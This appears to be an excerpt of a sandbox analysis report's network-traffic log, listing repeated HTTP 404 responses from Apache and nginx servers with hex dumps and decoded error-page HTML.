Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:11:11 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: brData Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf 77 ab cf b6 17 0d 94 d8 c5 5e 32 67 14 a9 df 44 31 e1 62 f6 41 da 78 56 3a 36 17 62 8e 0c 37 ef bb e7 e7 0f eb f6 e3 e7 fb 2f 17 67 d2 8f fc 5f 03 5b 7f 7a bf 8f bc f2 f1 fd fa d3 59 7f ce f4 70 fc b6 8e 6f 6f 2f 98 26 37 a7 c5 c7 f7 82 0c 75 50 22 9b c7 d9 b7 b5 fd db fb e7 4d e4 a1 5f 91 a6 9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: brData Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf 77 ab cf b6 17 0d 94 d8 c5 5e 32 67 14 a9 df 44 31 e1 62 f6 41 da 78 56 3a 36 17 62 8e 0c 37 ef bb e7 e7 0f eb f6 e3 e7 fb 2f 17 67 d2 8f fc 5f 03 5b 7f 7a bf 8f bc f2 f1 fd fa d3 59 7f ce f4 70 fc b6 8e 6f 6f 2f 98 26 37 a7 c5 c7 f7 82 0c 75 50 22 9b c7 d9 b7 b5 fd db fb e7 4d e4 a1 5f 91 a6 9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: brData Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf 77 ab cf b6 17 0d 94 d8 c5 5e 32 67 14 a9 df 44 31 e1 62 f6 41 da 78 56 3a 36 17 62 8e 0c 37 ef bb e7 e7 0f eb f6 e3 e7 fb 2f 17 67 d2 8f fc 5f 03 5b 7f 7a bf 8f bc f2 f1 fd fa d3 59 7f ce f4 70 fc b6 8e 6f 6f 2f 98 26 37 a7 c5 c7 f7 82 0c 75 50 22 9b c7 d9 b7 b5 fd db fb e7 4d e4 a1 5f 91 a6 9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache: HITData Raw: 31 34 37 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:53 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:11:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:12:02 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:12:07 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:12:10 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 